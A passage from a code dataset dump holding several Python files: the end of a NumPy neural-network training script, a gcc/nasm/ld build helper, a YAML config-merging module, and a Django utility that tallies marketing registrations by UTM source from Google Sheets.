prediction_probs_numpy.reshape(prediction_probs_numpy.shape[1], 1)\nvd.make_plot(vd.X_test, vd.y_test, \"NumPy Model\", file_name=None, XX=XX, YY=YY, preds=prediction_probs_numpy)\n\n# Accuracy achieved on the test set\n\nY_test_hat, _ = model.full_forward_propagation(np.transpose(vd.X_test), params_values, model.architecture)\nprint('Y test predicted shape', Y_test_hat.shape)\nprint('Y test shape before reshape',vd.y_test.shape)\nY_hat_converted, acc_test = model.get_accuracy_value(Y_test_hat, np.transpose(vd.y_test.reshape((vd.y_test.shape[0], 1))))\n\nprint('Y test predicted shape', Y_test_hat.shape)\nprint('Y test shape',vd.y_test.shape)\n\nprint('Y test predicted',Y_test_hat)\nprint('Y test predicted converted',Y_hat_converted)\nprint('Y test', vd.y_test)\nprint(\"Test set accuracy: {:.2f}\".format(acc_test))\n\n \n#plotting history\nprint('initial params as', ini_params)\nprint('last params as', params_values)\nprint('cost plot')\nplt.plot(cost_history)\nplt.show()\nprint ('accuracy over time', accuracy_history)\n\nprint ('Grads',grads_values)\n\nprint ('A and Z', cashe)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"394965481","text":"\nimport os.path\nimport subprocess\nimport sys\n\nfrom .parse import *\nfrom .shared import eprintf\n\ndef cc_relink_objs(verbose, cc_bin, arch, inputs, output, cflags):\n archflag = '-m64' if arch == \"x86_64\" else '-m32'\n\n cctyp, ccver = get_cc_version(cc_bin)\n assert cctyp == \"gcc\", \"A GCC compiler is needed for relinking objects!\"\n relink_arg = \"-flinker-output=rel\" if ccver < (9,0) else \"-flinker-output=nolto-rel\"\n\n args = [cc_bin, archflag, '-nostartfiles', '-nostdlib', \\\n '-r', relink_arg, '-o', output] + cflags + inputs\n\n if verbose: eprintf(\"cc: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\ndef nasm_assemble_elfhdr(verbose, nasm_bin, arch, rtdir, intbl, output, asflags):\n if rtdir[-1] != '/': rtdir = rtdir + '/'\n archflag = 'elf64' if arch == \"x86_64\" else 'elf32'\n\n args = [nasm_bin, '-I', rtdir, '-f', archflag] + asflags + [intbl, '-o', output]\n\n if verbose: eprintf(\"nasm: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\ndef ld_link_final(verbose, cc_bin, arch, lddir, inobjs, output, ldflags, nx, sectorder, debug):\n linkscr = None\n if arch == 'x86_64':\n linkscr = ('x86_64_%s_nx' if nx else 'x86_64_%s_rwx') % sectorder\n else:\n linkscr = '%s_%s' % (arch, sectorder)\n\n archflag = '-m64' if arch == \"x86_64\" else '-m32'\n\n args = [cc_bin, archflag, '-L', lddir, '-T', '%s/link_%s.ld'%(lddir,linkscr), '-no-pie']\n if not debug:\n args.append('-Wl,--oformat=binary')\n #args = [*args, '-T', lddir+'/link.ld', '-Wl,--oformat=binary']\n args += ['-nostartfiles', '-nostdlib', '-o', output, *inobjs, *ldflags]\n\n if verbose: eprintf(\"ld: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\n","sub_path":"smol/cnl.py","file_name":"cnl.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"566546938","text":"\"\"\"\nMerger module.\nContains the logic to merge loaded documents.\n\n- resolve_and_merge may be used to resolve and merge $ref entries in documents (as used by YamlConfigDocument).\n- load_subdocument may be used to load and merge sub-documents contained in YamlConfigDocuments.\n\n\"\"\"\nfrom typing import Union, Type, List, Optional\n\nfrom configcrunch import REF, REMOVE, REMOVE_FROM_LIST_PREFIX\n\nfrom typing import TYPE_CHECKING\n\nfrom configcrunch.interface import IYamlConfigDocument\nfrom configcrunch.loader import load_referenced_document\nfrom configcrunch.errors import ReferencedDocumentNotFound, InvalidRemoveError\n\nif TYPE_CHECKING:\n from configcrunch.abstract import YamlConfigDocument\n\n\ndef _merge_documents__recursion(target_node: any, source_node: any) -> any:\n \"\"\"\n Recursive merging step of merge_documents\n\n :param target_node: Node to MERGE INTO\n :param source_node: Node to MERGE FROM\n :return: Merge result\n \"\"\"\n # IS DICT IN SOURCE AND TARGET\n if isinstance(source_node, dict) and isinstance(target_node, dict):\n new_node = target_node.copy()\n for key, value in source_node.items():\n # Edge case: Normally we will remove all $remove markers after iterating over everything\n # to make sure everything is removed correctly. But if the key is $ref, we must remove\n # now, to make sure that the referenced document is not even loaded.\n if key == REF and value == REMOVE:\n if key in new_node:\n del new_node[key]\n else:\n if key in target_node:\n new_node[key] = _merge_documents__recursion(target_node[key], source_node[key])\n else:\n new_node[key] = source_node[key]\n return new_node\n\n # IS LIST IN SOURCE AND TARGET\n elif isinstance(source_node, list) and isinstance(target_node, list):\n result = list(target_node)\n result.extend(source_node)\n # Collect all $remove::\n removes = [\n x.split(REMOVE_FROM_LIST_PREFIX, 1)[-1]\n for x\n in result\n if isinstance(x, str) and x.startswith(REMOVE_FROM_LIST_PREFIX)\n ]\n # Remove all entries to remove\n result = list(filter(lambda x:\n not isinstance(x, str)\n or x not in removes,\n result))\n return result\n\n # IS YCD IN SOURCE AND TARGET\n elif isinstance(source_node, IYamlConfigDocument) and isinstance(target_node, IYamlConfigDocument):\n merge_documents(source_node, target_node)\n return source_node\n\n # IS SCALAR IN BOTH (or just in SOURCE)\n else:\n return source_node\n\n\ndef _delete_remove_markers__recursion(doc: any) -> any:\n \"\"\"\n Removes the $remove:: marker from all lists in doc.\n \"\"\"\n # IS DICT\n if isinstance(doc, dict):\n return {k: _delete_remove_markers__recursion(v) for k, v in doc.items() if v != REMOVE}\n\n # IS LIST\n elif isinstance(doc, list):\n # Remove all $remove:: entries\n return list(filter(lambda x:\n not isinstance(x, str)\n or not x.startswith(REMOVE_FROM_LIST_PREFIX),\n doc))\n\n # IS YCD\n elif isinstance(doc, IYamlConfigDocument):\n doc.doc = _delete_remove_markers__recursion(doc.doc)\n return doc\n\n # IS $remove\n if doc == REMOVE:\n raise InvalidRemoveError(\"Tried to remove a node at an unexpected position\")\n\n # IS SCALAR\n else:\n return doc\n\n\ndef delete_remove_markers(doc: 'YamlConfigDocument') -> None:\n \"\"\"\n Remove the $remove and $remove:: markers from the document\n :param doc:\n :return:\n \"\"\"\n _delete_remove_markers__recursion(doc)\n\n\ndef merge_documents(target: 'YamlConfigDocument', source: 'YamlConfigDocument') -> None:\n \"\"\"\n Merges two YamlConfigDocuments.\n\n :param target: Target document - this document will be changed, it will contain the result of merging target into source.\n :param source: Source document to base merge on\n \"\"\"\n newdoc = _merge_documents__recursion(source.doc, target.doc)\n target.doc = newdoc\n target.already_loaded_docs += source.already_loaded_docs\n\n new_entries = []\n for entry in source.absolute_paths:\n if entry not in target.absolute_paths:\n new_entries.append(entry)\n target.absolute_paths += new_entries\n\n\ndef resolve_and_merge(doc: 'YamlConfigDocument', lookup_paths: List[str]) -> None:\n \"\"\"\n Resolve the $ref entry at the beginning of the document body and merge with referenced documents\n (changes this document in place).\n May also be extended by subclasses to include sub-document resolving.\n\n :param doc: Document to work on\n :param lookup_paths: Paths to the repositories, where referenced should be looked up.\n :return:\n \"\"\"\n if REF in doc:\n # Resolve references\n prev_referenced_doc = None\n for referenced_doc in load_referenced_document(doc, lookup_paths):\n if prev_referenced_doc:\n # Merge referenced docs\n merge_documents(referenced_doc, prev_referenced_doc)\n prev_referenced_doc = referenced_doc\n if prev_referenced_doc is None:\n if doc.absolute_paths:\n raise ReferencedDocumentNotFound(\n f\"Referenced document {doc[REF]} not found. Requested by a document at {doc.absolute_paths[0]}\"\n )\n else:\n raise ReferencedDocumentNotFound(f\"Referenced document {doc[REF]} not found.\")\n # Resolve entire referenced docs\n resolve_and_merge(prev_referenced_doc, lookup_paths)\n # Merge content of current doc into referenced doc (and execute $remove's on the way)\n merge_documents(doc, prev_referenced_doc)\n # Remove $ref entry\n del doc[REF]\n\n\ndef load_subdocument(\n doc: 'Union[dict, YamlConfigDocument]',\n source_doc: 'YamlConfigDocument',\n doc_clss: 'Type[YamlConfigDocument]',\n lookup_paths: List[str],\n) -> Optional['YamlConfigDocument']:\n \"\"\"\n Load a subdocument of a specific type. This will convert the dict at this position\n into a YamlConfigDocument with the matching type and perform resolve_and_merge_references\n on it.\n\n :param doc: Dictionary with data to convert. Can also already be a document of the target type.\n :param source_doc: Parent document\n :param doc_clss: Class that is expected from the subdocument (target class)\n :param lookup_paths: Paths to the repositories, where referenced should be looked up.\n :return:\n \"\"\"\n doc_obj = doc\n if not isinstance(doc, doc_clss):\n doc_obj = doc_clss(doc, source_doc.path, source_doc,\n source_doc.already_loaded_docs, absolute_paths=source_doc.absolute_paths)\n\n return doc_obj.resolve_and_merge_references(lookup_paths)\n\n\ndef recursive_docs_to_dicts(input):\n \"\"\" Recursively removes all YamlConfigDocuments and replaces them by their doc dictionary.\"\"\"\n if isinstance(input, IYamlConfigDocument):\n return recursive_docs_to_dicts(input.doc.copy())\n elif isinstance(input, dict):\n new_dict = input.copy()\n for key, val in new_dict.items():\n new_dict[key] = recursive_docs_to_dicts(val)\n return new_dict\n elif isinstance(input, list):\n new_list = []\n for item in input.copy():\n new_list.append(recursive_docs_to_dicts(item))\n return new_list\n return input\n","sub_path":"configcrunch/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"288869762","text":"from .models import Langing\n\nimport pandas as pd\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom gspread_dataframe import get_as_dataframe\nimport vk_api\nimport time\nimport datetime\nimport re\n\nfrom rq import Queue\nfrom worker import conn\nfrom Startpage.utils import analitica,colvodneyforday\nfrom Startpage.utils_new_funnel import analitica_new_funnel,colvodneyforday_new_funnel\n\n\nfrom conecttosheets import connectsheet,connectIP,connect,connect_new_funnel\n\n\ndef googlesheets_new_funnel(completeurl,start,stop):\n df=connect_new_funnel(completeurl)\n df['new_col'] = df['utm_source'] + ' / ' + df['utm_medium']+ ' / ' + df['utm_campaign']+ ' / ' + df['utm_term']+ ' / ' + df['utm_content']\n a = df.dropna(subset=[list(df)[0]])\n newdf = a[['sended','utm_source', 'utm_medium', 'utm_campaign', 'new_col']]\n\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n\n\n #DELETE DATES\n for i in newdf['sended']:\n if i[:10] in datedelta or i==' ':\n pass\n else:\n newdf=newdf.drop(newdf.index[newdf['sended']==i])\n\n slovaritog = {'Уникальный пакет промо': 0,\n 'Уникальная рассылка': 0,\n 'Digest рассылка по всей базе': 0,\n 'Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)': 0,\n 'Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата ': 0,\n 'рассылка по базе кейсеров': 0,\n 'рассылка по IT базе': 0,\n 'рассылка по базе инженеров': 0,\n 'рассылка по базе нефтяников': 0,\n 'рассылка по базе бизнес': 0,\n 'рассылка по базе partials': 0,\n 'Рассылка по новой базе hh': 0,\n 'Рассылка по базе курса первокурсника': 0,\n 'Рассылка по старой базе hh': 0,\n 'Рассылка по базе финансистов и экономистов': 0,\n 'Рассылка по базе менеджмента': 0,\n 'Рассылка по базе аналитиков': 0,\n 'рассылка по базе региона Спб': 0,\n 'рассылка по базе региона Сибирь': 0,\n 'рассылка по базе региона Урал': 0,\n 'рассылка по базе региона Волга': 0,\n 'рассылка по базе региона Дальний Восток': 0,\n 'рассылка по базе Казахстана': 0,\n 'рассылка по прошлогодней базе проекта': 0,\n 'рассылка по прошлогодней базе Аламни': 0,\n 'рассылка по прошлогодней базе Школы': 0,\n 'рассылка по прошлогодней базе Тулкита': 0,\n 'рассылка по прошлогодней базе стажировок': 0,\n 'рассылка по базе б2б партнеров (холодные)': 0,\n 'рассылка по базе б2б партнеров (теплые)': 0,\n 'таргетинг тизеры vk': 0,\n 'таргетинг в новостой ленте vk': 0,\n 'таргетинг в VK Stories': 0,\n 'таргетинг в новостой ленте instagram': 0,\n 'таргетинг в Instagram Stories': 0,\n 'таргетинг stories fb': 0,\n 'таргетинг в новостой ленте fb': 0,\n 'таргетинг на лидформу fb': 0,\n 'таргетинг на лидформу вк': 0,\n 'SMM:стена вк основная группа': 0,\n 'SMM:стена вк группа Спб': 0,\n 'SMM:стена вк группа Сибири': 0,\n 'SMM:стена вк группа Урала': 0,\n 'SMM:стена вк группа Волги': 0,\n 'SMM:стена вк группа Казахстана': 0,\n 'SMM:рассылка-дайжест ВК в ЛС': 0,\n 'SMM:рассылка о кейс-чемприонатах ВК в ЛС': 0,\n 'SMM:рассылка с вакансиями ВК в ЛС': 0,\n 'SMM:рассылка о мероприятиях ВК в ЛС': 0,\n 'SMM:рассылка со статьями/полезными материалами ВК в ЛС': 0,\n 'SMM:стена клиентской группы ВК': 0,\n 'пост в телеграм-канале': 0,\n 'дайджест в телеграм-канале': 0,\n 'ссылка на главном слайдере': 0,\n 'ссылка на главной в разделе мероприятий': 0,\n 'ссылка на главной в разделе обучения/курсов': 0,\n 'ссылка на главной в разделе чемпионатов': 0,\n 'пуш-уведомление на сайте': 0,\n 'ссылка на странице мероприятий': 0,\n 'ссылка на странице обучение': 0,\n 'ссылка на странице чемпионатов': 0,\n 'ссылка на странице вакансии': 0,\n 'поп-ап на сайте веб-версия': 0,\n 'поп-ап на сайте мобильная версия': 0,\n 'ссылка с личного кабинета': 0,\n 'Ссылка по роликом на Yotube-канал': 0,\n 'группа ФБ': 0,\n 'Страница АА в ФБ': 0,\n 'Страница в Твиттере': 0,\n 'ссылка в БИО': 0,\n 'ссылка в сториз': 0,\n 'инфопартнеры:баннер на сайте': 0,\n 'инфопартнеры:пост вконтакте': 0,\n 'инфопартнеры:пост в Telegram': 0,\n 'инфопартнеры:имейл рассылка': 0,\n 'инфопартнеры:статья или анонс на сайте': 0,\n 'инфопартнеры:пост в Twitter': 0,\n 'инфопартнеры:пост в Instagram': 0,\n 'инфопартнеры:пост в Facebook': 0,\n 'Амбассадор договаривается о размещении на онлайн-ресурса��': 0,\n 'Амбассадор собирает офлайн-регистрации': 0,\n 'Размещение в ЦРК': 0,\n 'Размещение в студсовете': 0,\n 'Размещение в профкоме': 0,\n 'Размещение в кейс-клубе': 0,\n 'Размещение в медиа': 0,\n 'Размещение в главной группе вуза': 0,\n 'Размещение для выпускников': 0,\n 'Размещение в бизнес-клубе': 0,\n 'Размещение на кафедре': 0,\n 'Размещение через преподавателей': 0,\n 'Размещение в студенческом научном обществе': 0,\n 'Размещение через онлайн-аутсорс': 0,\n 'Размещение через офлайн-аутсорс': 0,\n 'Роадшоу с флаерами/плакатами (регистрации по QR-коду)': 0,\n 'Роадшоу с анкетами (с дальнейшей оцифровкой)': 0,\n 'Размещение в СМИ': 0,\n 'прозвон по базе hh с отправкой рассылки': 0,\n 'Прозвон по partials с отправкой рассылки': 0,\n 'Прозвон по базам прошлых лет с отправкой рассылки': 0,\n 'Прозвон по каким-либо базам с отправкой рассылки': 0,\n 'Прозвон с регистрацией на звонке': 0,\n 'Яндекс на поиске по брендовым запросам': 0,\n 'Яндекс РСЯ по брендовым запросам': 0,\n 'Яндекс на Поиске по запросам без упоминания бренда': 0,\n 'Яндекс РСЯ по запросам без упоминания бренда': 0,\n 'Google на поиске по брендовым запросам': 0,\n 'Google КМС по брендовым запросам': 0,\n 'Google на Поиске по запросам без упоминания бренда': 0,\n 'Google КМС по запросам без упоминания бренда': 0,\n 'Youtube контекст': 0,\n 'Виртуальный рекрутер': 0,\n 'Органика': 0,\n 'Неопознанный трафик': 0}\n for k in list(newdf['new_col']):\n i = str(k)\n if 'all / changellenge / unical-promo' in i:\n slovaritog['Уникальный пакет промо'] += 1\n elif 'email / generalbase' in i:\n slovaritog['Уникальная рассылка'] += 1\n elif 'email / digest' in i:\n slovaritog['Digest рассылка по всей базе'] += 1\n elif 'email / segment-mailchimp' in i:\n slovaritog['Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)'] += 1\n elif 'email / segment' in i:\n slovaritog['Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата '] += 1\n elif 'email / segment / cup' in i:\n slovaritog['рассылка по базе кейсеров'] += 1\n elif 'email / segment / it' in i:\n slovaritog['рассылка по IT базе'] += 1\n elif 'email / segment / engineers' in i:\n slovaritog['рассылка по базе инженеров'] += 1\n elif 'email / segment / oil' in i:\n slovaritog['рассылка по базе нефтяников']+= 1\n elif 'email / segment / business' in i:\n slovaritog['рассылка по базе бизнес'] += 1\n elif 'email / segment / partials' in i:\n slovaritog['рассылка по базе partials'] += 1\n elif 'email / segment / external' in i:\n slovaritog['Рассылка по новой базе hh'] += 1\n\n\n\n\n elif 'email / segment / kp' in i:\n slovaritog['Рассылка по базе курса первокурсника']+= 1\n elif 'email / segment / old-external' in i:\n slovaritog['Рассылка по старой базе hh'] += 1\n elif 'email / segment / fin' in i:\n slovaritog['Рассылка по базе финансистов и экономистов']+= 1\n elif 'email / segment / manager' in i:\n slovaritog['Рассылка по базе менеджмента'] += 1\n elif 'email / segment / analytic' in i:\n slovaritog['Рассылка по базе аналитиков'] += 1\n elif 'email / segment / spb' in i:\n slovaritog['рассылка по базе региона Спб'] += 1\n elif 'email / segment / siberia' in i:\n slovaritog['рассылка по базе региона Сибирь']+= 1\n elif 'eemail / segment / ural' in i:\n slovaritog['рассылка по базе региона Урал'] += 1\n elif 'email / segment / volga' in i:\n slovaritog['рассылка по базе региона Волга'] += 1\n elif 'email / segment / dv' in i:\n slovaritog['рассылка по базе региона Дальний Восток'] += 1\n elif 'email / segment / kz' in i:\n slovaritog['рассылка по базе Казахстана'] += 1\n elif 'email / segment / last-year' in i:\n slovaritog['рассылка по прошлогодней базе проекта'] += 1\n elif 'email / segment / alumni' in i:\n slovaritog['рассылка по прошлогодней базе Аламни'] += 1\n elif 'email / segment / school' in i:\n slovaritog['рассылка по прошлогодней базе Школы'] += 1\n elif 'email / segment / toolkit' in i:\n slovaritog['рассылка по прошлогодней базе Тулкита'] += 1\n elif 'email / segment / internship' in i:\n slovaritog['рассылка по прошлогодней базе стажировок'] += 1\n elif 'email / hr-digest / cold' in i:\n slovaritog['рассылка по базе б2б партнеров (холодные)'] += 1\n elif 'email / hr-digest / warm' in i:\n slovaritog['рассылка по базе б2б партнеров (теплые)'] += 1\n elif 'target / vk / tizer' in i:\n slovaritog['таргетинг тизеры vk'] += 1\n elif 'target / vk / post' in i:\n slovaritog['таргетинг в новостой ленте vk'] += 1\n elif 'target / vk / story' in i:\n slovaritog['таргетинг в VK Stories'] += 1\n elif 'target / insta / post' in i:\n slovaritog['таргетинг в новостой ленте instagramа']+= 1\n elif 'target / insta / story' in i:\n slovaritog['таргетинг в Instagram Stories']+= 1\n elif 'target / fb / story' in i:\n slovaritog['таргетинг stories fb'] += 1\n elif 'target / fb / post' in i:\n slovaritog['таргетинг в новостой ленте fb'] += 1\n elif 'target / fb / leadform' in i:\n slovaritog['таргетинг на лидформу fb'] += 1\n elif 'target / vk / leadform' in i:\n slovaritog['таргетинг на лидформу вк'] += 1\n elif 'vk / global / post' in i:\n slovaritog['SMM:стена вк основная группа'] += 1\n elif 'vk / spb / post' in i:\n slovaritog['SMM:стена вк группа Спб'] += 1\n elif 'vk / siberia / post' in i:\n slovaritog['SMM:стена вк группа Сибири'] += 1\n elif 'vk / ural / post' in i:\n slovaritog['SMM:стена вк группа Урала'] += 1\n elif 'vk / volga / post' in i:\n slovaritog['SMM:стена вк группа Волги'] += 1\n elif 'vk / kz / post' in i:\n slovaritog['SMM:стена вк группа Казахстана'] += 1\n elif 'vk / global / digest' in i:\n slovaritog['SMM:рассылка-дайжест ВК в ЛС'] += 1\n elif 'vk / global / cups' in i:\n slovaritog['SMM:рассылка о кейс-чемприонатах ВК в ЛС'] += 1\n elif 'vk / global / vacancy' in i:\n slovaritog['SMM:рассылка с вакансиями ВК в ЛС'] += 1\n elif 'vk / global / events' in i:\n slovaritog['SMM:рассылка о мероприятиях ВК в ЛС'] += 1\n elif 'vk / global / article' in i:\n slovaritog['SMM:рассылка со статьями/полезными материалами ВК в ЛС'] += 1\n elif 'vk / ' in i and 'post / (not set)' in i:\n slovaritog['SMM:стена клиентской группы ВК'] += 1\n elif 'tg / post' in i:\n slovaritog['пост в телеграм-канале'] += 1\n elif 'tg / digest' in i:\n slovaritog['дайджест в телеграм-канале'] += 1\n elif 'cl-site / main / slider' in i:\n slovaritog['ссылка на главном слайдере'] += 1\n elif 'cl-site / main / events' in i:\n slovaritog['ссылка на главной в разделе мероприятий'] += 1\n elif 'cl-site / main / education' in i:\n slovaritog['ссылка на главной в разделе обучения/курсов'] += 1\n elif 'cl-site / main / champs' in i:\n slovaritog['ссылка на главной в разделе чемпионатов'] += 1\n elif 'cl-site / push' in i:\n slovaritog['пуш-уведомление на сайте'] += 1\n elif 'cl-site / page / event' in i:\n slovaritog['ссылка на странице мероприятий'] += 1\n elif 'cl-site / page / education' in i:\n slovaritog['ссылка на странице обучение'] += 1\n elif 'cl-site / page / champs' in i:\n slovaritog['ссылка на странице чемпионатов'] += 1\n elif 'cl-site / page / vacancy' in i:\n slovaritog['ссылка на странице вакансии'] += 1\n elif 'cl-site / popup / desktop' in i:\n slovaritog['поп-ап на сайте веб-версия'] += 1\n elif 'cl-site / popup / mobile' in i:\n slovaritog['поп-ап на сайте мобильная версия'] += 1\n elif 'cl-site / main / personal' in i:\n slovaritog['ссылка с личного кабинета'] += 1\n elif 'youtube / video' in i:\n slovaritog['Ссылка по роликом на Yotube-канал'] += 1\n elif 'fb / post' in i:\n slovaritog['группа ФБ'] += 1\n elif 'fb / post / aa' in i:\n slovaritog['Страница АА в ФБ'] += 1\n elif 'twitter / post / aa' in i:\n slovaritog['Страница в Твиттере'] += 1\n elif 'inst / bio' in i:\n slovaritog['ссылка в БИО'] += 1\n elif 'inst / stories' in i:\n slovaritog['ссылка в сториз'] += 1\n elif 'ip /' in i and 'banner /' in i:\n slovaritog['инфопартнеры:баннер на сайте'] += 1\n elif 'ip /' in i and 'vk-post /' in i:\n slovaritog['инфопартнеры:пост вконтакте'] += 1\n elif 'ip /' in i and 'tg-post /' in i:\n slovaritog['инфопартнеры:пост в Telegram'] += 1\n elif 'ip /' in i and 'email /' in i:\n slovaritog['инфопартнеры:имейл рассылка'] += 1\n elif 'ip /' in i and 'article /' in i:\n slovaritog['инфопартнеры:статья или анонс на сайте'] += 1\n elif 'ip /' in i and 'tw-post /' in i:\n slovaritog['инфопартнеры:пост в Twitter'] += 1\n elif 'ip /' in i and 'inst-post /' in i:\n slovaritog['инфопартнеры:пост в Instagram'] += 1\n elif 'ip /' in i and 'fb-post /' in i:\n slovaritog['инфопартнеры:пост в Facebook'] += 1\n elif 'amb /' in i and 'online /' in i:\n slovaritog['Амбассадор договаривается о размещении на онлайн-ресурсах'] += 1\n elif 'amb /' in i and 'offline /' in i:\n slovaritog['Амбассадор собирает офлайн-регистрации'] += 1\n elif 'vuz /' in i and 'crk / chat /' in i:\n slovaritog['Размещение в ЦРК'] += 1\n elif 'vuz /' in i and 'studsovet / vk-post /' in i:\n slovaritog['Размещение в студсовете'] += 1\n elif 'vuz /' in i and 'profkom / fb-post /' in i:\n slovaritog['Размещение в профкоме'] += 1\n elif 'vuz /' in i and 'kk / website /' in i:\n slovaritog['Размещение в кейс-клубе'] += 1\n elif 'vuz /' in i and 'media / email /' in i:\n slovaritog['Размещение в медиа'] += 1\n elif 'vuz /' in i and 'maingroup / article /' in i:\n slovaritog['Размещение в главной группе вуза'] += 1\n elif 'vuz /' in i and 'alumni / webinar /' in i:\n slovaritog['Размещение для выпускников'] += 1\n elif 'vuz /' in i and 'bk /' in i:\n slovaritog['Размещение в бизнес-клубе'] += 1\n elif 'vuz /' in i and 'kafedra /' in i:\n slovaritog['Размещение на кафедре'] += 1\n elif 'vuz /' in i and 'teacher /' in i:\n slovaritog['Размещение через преподавателей'] += 1\n elif 'vuz /' in i and 'sno /' in i:\n slovaritog['Размещение в студенческом научном обществе'] += 1\n elif 'vuz /' in i and 'online-outsors /' in i:\n slovaritog['Размещение через онлайн-аутсорс'] += 1\n elif 'vuz /' in i and 'offline-outsors /' in i:\n slovaritog['Размещение через офлайн-аутсорс'] += 1\n elif 'vuz /' in i and 'flyer /' in i:\n slovaritog['Роадшоу с флаерами/плакатами (регистрации по QR-коду)'] += 1\n elif 'vuz /' in i and 'roadshow /' in i:\n slovaritog['Роадшоу с анкетами (с дальнейшей оцифровкой)'] += 1\n elif 'smi /' in i and '(not set) / (not set)' in i:\n slovaritog['Размещение в СМИ '] += 1\n elif 'tlm / email / external' in i:\n slovaritog['прозвон по базе hh с отправкой рассылки'] += 1\n elif 'tlm / email / partials' in i:\n slovaritog['Прозвон по partials с отправкой рассылки'] += 1\n elif 'tlm / email / last-year' in i:\n slovaritog['Прозвон по базам прошлых лет с отправкой рассылки'] += 1\n elif 'tlm / email' in i:\n slovaritog['Прозвон по каким-либо базам с отправкой рассылки'] += 1\n elif 'tlm / reg' in i:\n slovaritog['Прозвон с регистрацией на звонке'] += 1\n elif 'yandex / cpc' in i and 'brand' in i:\n slovaritog['Яндекс на поиске по брендовым запросам'] += 1\n elif 'yandex / cpm' in i and 'brand' in i:\n slovaritog['Яндекс РСЯ по брендовым запросам'] += 1\n elif 'yandex / cpc' in i and 'general' in i:\n slovaritog['Яндекс на Поиске по запросам без упоминания бренда'] += 1\n elif 'yandex / cpm' in i and 'general' in i:\n slovaritog['Яндекс РСЯ по запросам без упоминания бренда'] += 1\n elif 'google / cpc' in i and 'brand' in i:\n slovaritog['Google на поиске по брендовым запросам'] += 1\n elif 'google / cpm' in i and 'brand' in i:\n slovaritog['Google КМС по брендовым запросам'] += 1\n elif 'google / cpc' in i and 'general' in i:\n slovaritog['Google на Поиске по запросам без упоминания бренда'] += 1\n elif 'google / cpm' in i and 'general' in i:\n slovaritog['Google КМС по запросам без упоминания бренда'] += 1\n elif 'youtube / cpm' in i and 'brand' in i:\n slovaritog['Youtube контекст'] += 1\n elif 'external-lidgen / cpc / premium' in i:\n slovaritog['Виртуальный рекрутер'] += 1\n elif '(direct) / (none)' in i or 'referral' in i or 'organic' in i:\n slovaritog['Органика'] += 1\n else:\n slovaritog['Неопознанный трафик'] += 1\n\n\n\n return dict((k, v) for k, v in slovaritog.items() if v!=0)\n\ndef googlesheets(completeurl,start,stop):\n df=connect(completeurl)\n df['new_col'] = df['utm_source'] + ' / ' + df['utm_medium']\n a = df.dropna(subset=[list(df)[0]])\n newdf = a[['sended','utm_source', 'utm_medium', 'utm_campaign', 'new_col']]\n\n\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n\n\n #DELETE DATES\n for i in newdf['sended']:\n if i[:10] in datedelta or i==' ':\n pass\n else:\n newdf=newdf.drop(newdf.index[newdf['sended']==i])\n print(newdf)\n\n slovaritog = {'Уникальная': 0, 'Дайджест': 0, 'SMM репостов': 0,\n 'Инфопартнеры':0, 'Рассылка из юнисендера': 0, 'Промо в вузах': 0, 'Телеграм': 0,\n 'Таргетинг': 0,\n 'Веб-страница и слайдер': 0, 'Контекстная реклама': 0, 'Органика':0, 'Неопознанный трафик': 0}\n for i in list(newdf['new_col']):\n ii = str(i)\n if 'generalbase' in ii or 'mailchimp' in ii:\n slovaritog['Уникальная'] += 1\n elif 'digest' in ii or 'Digest' in ii:\n slovaritog['Дайджест'] += 1\n elif 'vk-wall' in ii or 'vk_wall' in ii:\n slovaritog['SMM репостов'] += 1\n elif 'ip-' in ii or 'ip_' in ii:\n slovaritog['Инфопартнеры'] += 1\n elif 'mail' in ii or 'email' in ii or 'Unisender' in ii or 'unisender' in ii or 'utm_source' in ii or 'UniSender' in ii:\n slovaritog['Рассылка из юнисендера'] += 1\n elif 'vuz-' in ii or 'vuz_' in ii:\n slovaritog['Промо в вузах'] += 1\n elif 'tg /' in ii or 'Tg /' in ii:\n slovaritog['Телеграм'] += 1\n elif 'vk / target' in ii or 'vk / targetpost' in ii or 'vk / target-story' in ii or 'insta / target' in ii or 'insta / targetpost' in ii or 'insta / target-story' in ii or 'fb / target' in ii or 'fb / targetpost' in ii or 'target' in ii:\n slovaritog['Таргетинг'] += 1\n elif 'cl-site' in ii or 'Сl-site' in ii or 'cl_site' in ii or 'Сl_site' in ii:\n slovaritog['Веб-страница и слайдер'] += 1\n elif 'google / cpc' in ii or 'youtube / instream' in ii or 'yandex / cpc' in ii:\n slovaritog['Контекстная реклама'] += 1\n elif i==' / ':\n slovaritog['Органика'] += 1\n else:\n slovaritog['Неопознанный трафик'] += 1\n\n return slovaritog\n\ndef infopartnerip(urlland,start,stop):\n dfip=connectIP('https://docs.google.com/spreadsheets/d/1WmDnz3794uoU_h7ho_hOPMISUA2CdXt_UA_8L9pcJ-s/edit?pli=1#gid=0')\n costdf = dfip[dfip.values == urlland].loc[:,['Дата выдачи','Стоимость ']]\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = 